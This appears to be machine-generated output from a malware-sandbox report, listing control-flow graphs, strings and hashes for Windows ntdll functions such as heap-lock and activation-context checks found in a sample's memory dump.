                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                  • API String ID: 0-929470617
                                  • Opcode ID: b8b67362399614b2277a46111d283d5d3dcd6482891966c5ac23cef39c9f177f
                                  • Instruction ID: 8d00949de0114ffba889b2dae60888902e0f7183354e95d69f8f9c4d676dc0e8
                                  • Opcode Fuzzy Hash: b8b67362399614b2277a46111d283d5d3dcd6482891966c5ac23cef39c9f177f
                                  • Instruction Fuzzy Hash: E9E1F7706083018FD72DCE28D884B6ABBE9BF84314F194A2DF956EB2D1D732D955CB42
                                  Function 0116D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 405 116d770-116d7ab 406 116d9e7-116d9ee 405->406 407 116d7b1-116d7bb 405->407 406->407 408 116d9f4-11b932c 406->408 409 116d7c1-116d7ca 407->409 410 11b9357 407->410 408->407 413 11b9332-11b9337 408->413 409->410 412 116d7d0-116d7d3 409->412 414 11b9361-11b9370 410->414 415 116d9da-116d9dc 412->415 416 116d7d9-116d7db 412->416 418 116d927-116d938 call 1194c30 413->418 420 11b934b-11b9354 call 11df290 414->420 417 116d7e1-116d7e4 415->417 419 116d9e2 415->419 416->410 416->417 417->410 421 116d7ea-116d7ed 417->421 419->421 420->410 424 116d7f3-116d7f6 421->424 425 116d9f9-116da02 421->425 428 116d7fc-116d848 call 116d660 424->428 429 116da0d-116da16 424->429 425->424 430 116da08-11b9346 425->430 428->418 435 116d84e-116d852 428->435 429->428 433 116da1c 429->433 430->420 433->414 435->418 436 116d858-116d85f 435->436 437 116d865-116d869 436->437 438 116d9d1-116d9d5 436->438 440 116d870-116d87a 437->440 439 11b9563-11b957b call 11df290 438->439 439->418 440->439 441 116d880-116d887 440->441 443 116d8ed-116d90d 441->443 444 116d889-116d88d 441->444 446 116d910-116d913 443->446 447 116d893-116d898 444->447 448 11b9372 444->448 449 116d915-116d918 446->449 450 116d93b-116d940 446->450 451 11b9379-11b937b 447->451 452 116d89e-116d8a5 447->452 448->451 453 11b9559-11b955e 449->453 454 116d91e-116d920 449->454 455 116d946-116d949 450->455 456 11b94d3-11b94db 450->456 451->452 457 11b9381-11b93aa 451->457 458 11b93ea-11b93ed 452->458 459 116d8ab-116d8e3 call 1198250 452->459 453->418 461 116d922 454->461 462 116d971-116d98c call 116a6e0 454->462 463 116da21-116da2f 455->463 464 116d94f-116d952 455->464 456->463 465 11b94e1-11b94e5 456->465 457->443 466 11b93b0-11b93ca call 11a82c0 457->466 460 11b93f1-11b9400 call 11a82c0 458->460 476 116d8e5-116d8e7 459->476 487 11b9402-11b9410 460->487 488 11b9417 460->488 461->418 483 11b9528-11b952d 462->483 484 116d992-116d9ba 462->484 471 116d954-116d964 463->471 474 116da35-116da3e 463->474 464->449 464->471 465->463 472 11b94eb-11b94f4 465->472 466->476 482 11b93d0-11b93e3 466->482 471->449 478 116d966-116d96f 471->478 479 11b9512-11b9514 472->479 480 11b94f6-11b94f9 472->480 474->454 476->443 485 11b9420-11b9424 476->485 478->454 479->463 486 11b951a-11b9523 479->486 489 11b94fb-11b9501 480->489 490 11b9503-11b9506 480->490 482->466 491 11b93e5 482->491 494 116d9bc-116d9be 483->494 495 11b9533-11b9536 483->495 484->494 485->443 497 11b942a-11b9430 485->497 486->454 487->460 496 11b9412 487->496 488->485 489->479 492 11b9508-11b950d 490->492 493 11b950f 490->493 491->443 492->486 493->479 498 11b9549-11b954e 494->498 499 116d9c4-116d9cb 494->499 495->494 500 11b953c-11b9544 495->500 496->443 501 11b9432-11b944f 497->501 502 11b9457-11b9460 497->502 498->418 503 11b9554 498->503 499->438 499->440 500->446 501->502 504 11b9451-11b9454 501->504 505 11b9462-11b9467 502->505 506 11b94a7-11b94a9 502->506 503->453 504->502 505->506 507 11b9469-11b946d 505->507 508 11b94ab-11b94c6 call 1154508 506->508 509 11b94cc-11b94ce 506->509 510 11b946f-11b9473 507->510 511 11b9475-11b94a1 RtlDebugPrintTimes 507->511 508->418 508->509 509->418 510->506 510->511 511->506 515 11b94a3 511->515 515->506
                                  APIs
                                  Strings
                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 011B9341, 011B9366
                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011B9346
                                  • GsHd, xrefs: 0116D874
                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011B936B
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                  • API String ID: 3446177414-576511823
                                  • Opcode ID: dd7a471761984d228d5852cfb93cf01c0239fadf49b26f0a7c56c5615d74efa9
                                  • Instruction ID: 3cb4999617e38be849b8d7c5d2d264d53987f98a9e976da03742c469a95f7e09
                                  • Opcode Fuzzy Hash: dd7a471761984d228d5852cfb93cf01c0239fadf49b26f0a7c56c5615d74efa9
                                  • Instruction Fuzzy Hash: 2CE1C5707083468FDB1CCF68D4C0B6ABBE9BF88318F04492DEA958B291D772D955CB42
                                  Function 0119B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 516 119b5ec-119b5fc 517 119b5fe 516->517 518 119b600-119b602 516->518 517->518 519 119b608-119b60d 518->519 520 119b830-119b844 call 1194b87 518->520 521 119b60f-119b612 519->521 522 119b621-119b62e 519->522 521->520 524 119b618-119b61b 521->524 525 119b631-119b63d call 119b5e6 522->525 524->520 524->522 529 119b64a-119b653 525->529 530 119b63f-119b644 525->530 531 119b65a-119b65d 529->531 532 119b655-119b658 529->532 530->530 533 119b646-119b648 530->533 534 119b65f-119b662 531->534 535 119b665-119b66d 531->535 532->534 533->525 534->535 536 119b66f-119b672 535->536 537 119b690-119b693 535->537 538 119b67c-119b680 536->538 539 119b674 536->539 540 119b6ad-119b6d4 call 1196810 537->540 541 119b695-119b698 537->541 544 119b68a-119b68d 538->544 545 119b682-119b684 538->545 543 119b676-119b67a 539->543 551 119b6d7-119b6e9 call 119b5e6 540->551 541->540 546 119b69a-119b69e 541->546 543->540 544->537 545->544 548 119b686-119b688 545->548 549 119b6a0-119b6a2 546->549 550 119b6a4-119b6aa 546->550 548->543 549->540 549->550 550->540 554 119b6eb-119b6f1 551->554 555 119b6f3-119b704 call 119b5e6 551->555 556 119b71b-119b727 554->556 564 119b70a-119b713 555->564 565 119b791-119b794 555->565 559 119b729-119b735 556->559 560 119b797 556->560 561 119b737 559->561 562 119b766-119b769 559->562 563 119b79a-119b79e 560->563 566 119b739-119b73c 561->566 567 119b73e-119b741 561->567 570 119b76c-119b786 call 1196580 562->570 568 119b7ad-119b7b0 563->568 569 119b7a0-119b7a2 563->569 571 119b718 564->571 572 119b715 564->572 565->560 566->562 566->567 575 119b743-119b746 567->575 576 119b757-119b762 567->576 577 119b7df-119b7ed call 11dd8b0 568->577 578 119b7b2-119b7b5 568->578 573 119b7a4 569->573 574 119b7a7-119b7ab 569->574 594 119b789-119b78c 570->594 571->556 572->571 573->574 580 119b815-119b81a 574->580 575->576 581 119b748-119b74e 575->581 576->563 584 119b764 576->584 595 119b7ef-119b7f5 577->595 596 119b7f7-119b7fa 577->596 582 119b80f 578->582 583 119b7b7-119b7ba 578->583 592 119b81c 580->592 593 119b81e-119b821 580->593 581->570 588 119b750 581->588 589 119b812 582->589 590 119b7bc-119b7c1 583->590 591 119b7ce-119b7d3 583->591 584->594 588->576 597 119b752-119b755 588->597 589->580 590->577 598 119b7c3-119b7c6 590->598 591->582 601 119b7d5 591->601 592->593 599 119b829-119b82f 593->599 600 119b823-119b827 593->600 594->551 595->580 602 119b7fc-119b803 596->602 603 119b805-119b80d 596->603 597->570 597->576 598->589 604 119b7c8-119b7ca 598->604 600->599 601->577 605 119b7d7-119b7dd 601->605 602->580 603->580 604->577 606 119b7cc 604->606 605->577 605->589 606->589
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                  • Instruction ID: d3661a324fcbea718fa02b31f587987d73418be826cb2f1c25f0fcd994395905
                                  • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                  • Instruction Fuzzy Hash: 9B81A370E092499EEF2D8E6CE891FFEBBB1AF45350F184259D871A72D1C7349840CB59
                                  Function 01159126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 607 1159126-11591db call 11a7eb0 call 1199020 call 1169950 614 11591f1-11591f8 607->614 615 11591dd-11591ee 607->615 614->615 616 11591fa-1159201 614->616 616->615 617 1159203-115921f call 116a250 616->617 617->615 620 1159221-1159227 617->620 621 11b2518-11b251d 620->621 622 115922d-1159234 620->622 621->615 623 11b2522-11b2529 622->623 624 115923a 622->624 625 1159241-115929e call 1175b20 623->625 626 11b252f-11b2539 623->626 624->625 625->615 629 11592a4-11592ba call 11705a0 625->629 626->625 629->615 632 11592c0-11b256b RtlDebugPrintTimes 629->632 632->615 635 11b2571-11b257a 632->635 636 11b2651-11b265c 635->636 637 11b2580-11b2595 call 116dd20 635->637 639 11b265e-11b2669 RtlDebugPrintTimes ReleaseActCtx 636->639 640 11b26a0-11b26a7 636->640 642 11b259d-11b25cb call 1169950 637->642 643 11b2597-11b2598 call 1163c70 637->643 639->640 640->615 647 11b25cd-11b25ea call 116a250 642->647 648 11b2645-11b264c call 11b2674 642->648 643->642 647->648 652 11b25ec-11b25f2 647->652 648->636 653 11b25fb-11b2638 call 11705a0 652->653 654 11b25f4-11b25f9 652->654 653->648 658 11b263a 653->658 655 11b263f 654->655 655->648 658->655
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$@
                                  • API String ID: 3446177414-1194432280
                                  • Opcode ID: 03a94850c8b1fbb7ea26bae85df9866fc20a64f755ed8a77dbe44c57c584402a
                                  • Instruction ID: 1fb8600febace6a0a757d59d085944947022ef87d1ea104376c82687728cd63f
                                  • Opcode Fuzzy Hash: 03a94850c8b1fbb7ea26bae85df9866fc20a64f755ed8a77dbe44c57c584402a
                                  • Instruction Fuzzy Hash: 7681FB75D00269DBDB399B54CC84BEEBAB8AB48754F0041DAEA19B7240D7705E84CFA1
                                  Function 01194960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 659 1194960-119498e 660 1194990-11949b0 RtlDebugPrintTimes 659->660 661 11949b6-11949bd 659->661 660->661 664 1194a6d-1194a70 660->664 662 1194a68 661->662 663 11949c3-11949c7 661->663 662->664 663->662 666 11949cd-11949d5 663->666 666->662 667 11949db-11949df 666->667 667->662 668 11949e5-11949e8 667->668 668->662 669 11949ea-11949ee 668->669 669->662 670 11949f0-11949f4 669->670 670->662 671 11949f6-1194a4c call 1181e46 call 11989a0 * 3 call 1181e46 670->671 682 1194a4e-1194a51 671->682 683 1194a63-1194a66 671->683 682->683 684 1194a53-1194a5d 682->684 683->662 684->683 685 1194a5f-1194a61 684->685 685->664
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: 0Iv$0Iv$0Iv$X
                                  • API String ID: 3446177414-728256981
                                  • Opcode ID: 52ca78e0ae1fa594d62aa3738923fac60c882224b7a637acde563ec2368da89f
                                  • Instruction ID: 4a726854128e1d32aea4d6ae690935459133d4c902423345ca37e344a7593b86
                                  • Opcode Fuzzy Hash: 52ca78e0ae1fa594d62aa3738923fac60c882224b7a637acde563ec2368da89f
                                  • Instruction Fuzzy Hash: 0C31C03690020AEFCF26DF58E944B8E3BB1BBC9358F004019FD2996245D3789A92CF85
                                  Function 0117DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                  • API String ID: 3446177414-56086060
                                  • Opcode ID: 8740359161b14cf57cca8a40c2791f5fd994bbd5388c8fe3ab0ab8a4d2489d64
                                  • Instruction ID: 0b145f05ff9c9cdc57ac7df19db898f0aec18ee5964f821023076f5e4fa9efcf
                                  • Opcode Fuzzy Hash: 8740359161b14cf57cca8a40c2791f5fd994bbd5388c8fe3ab0ab8a4d2489d64
                                  • Instruction Fuzzy Hash: 51417670600646DFDB2EDFB8C889BBAB7B4EF15724F048069E80197391C774A881CB91
                                  Function 011D4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 011D4899
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011D4888
                                  • LdrpCheckRedirection, xrefs: 011D488F
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 3446177414-3154609507
                                  • Opcode ID: 2c32deaaa00c5d199c0cc74aea9cd7b46f8849bc48a9cf21b0a71bac00c83505
                                  • Instruction ID: 4868098952a326ba4fb192472251a257f136ad95abe406d5064590ec726065c0
                                  • Opcode Fuzzy Hash: 2c32deaaa00c5d199c0cc74aea9cd7b46f8849bc48a9cf21b0a71bac00c83505
                                  • Instruction Fuzzy Hash: 5F41B232A046519FCB29CE9CD841A277BE5EF49A90F06056DED89EBF51D730E800CB91
                                  Function 0117DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                  • API String ID: 3446177414-3526935505
                                  • Opcode ID: 3dbb2298d6a94eb694bf6db8efa05ead293ab0a4d0ce8ee4d6c5f57fe1c654bb
                                  • Instruction ID: 169151b2ac6e63de0dd986dfd7d93527412089d070cd736db687479973affa79
                                  • Opcode Fuzzy Hash: 3dbb2298d6a94eb694bf6db8efa05ead293ab0a4d0ce8ee4d6c5f57fe1c654bb
                                  • Instruction Fuzzy Hash: 19310535104B95EFDB2EDB68DC89BA67BF4EF12B14F044099E44287792C7B4A881C752
                                  Function 0114C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $
                                  • API String ID: 3446177414-3993045852
                                  • Opcode ID: 8063be562284c226de7e3062ad12b345b818d2d518c87546235fd686ee9a6297
                                  • Instruction ID: 551b66d81590a65cca15538324e961ae39460baa44cb66eefcd9839cf37d0baf
                                  • Opcode Fuzzy Hash: 8063be562284c226de7e3062ad12b345b818d2d518c87546235fd686ee9a6297
                                  • Instruction Fuzzy Hash: AC115E36A04618EBCF19AFA4F848A9D7F71FF44764F108119F92A676D0CB725A40CB40
                                  Function 0117EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c13bbc623deab4337cc8298183704478d76d90ed81197c53f4d173867d93f7d
                                  • Instruction ID: bbc788eccefa8bdc1c34ec4f75b03d33937da03f0fac364c838417974d7ab0a6
                                  • Opcode Fuzzy Hash: 4c13bbc623deab4337cc8298183704478d76d90ed81197c53f4d173867d93f7d
                                  • Instruction Fuzzy Hash: FEE11F75D00209CFCF29CFA9D984AAEBBF1BF48314F24456AE566A7361D730A842CF11
                                  Function 011CEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: c4c23c3baf9196c446f6ce99e7ea8e7c6a623188c2ae090b68c864654cc65495
                                  • Instruction ID: 620c1dc5fbcdef05d8397d1e3567e90ea0aae642f1b63577e6fcbb7a98e96287
                                  • Opcode Fuzzy Hash: c4c23c3baf9196c446f6ce99e7ea8e7c6a623188c2ae090b68c864654cc65495
                                  • Instruction Fuzzy Hash: C5714871E0021A9FDF09CFA4C984ADDBBB6BF58B14F14402EE905FB254D774A906CB51
                                  Function 011CF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
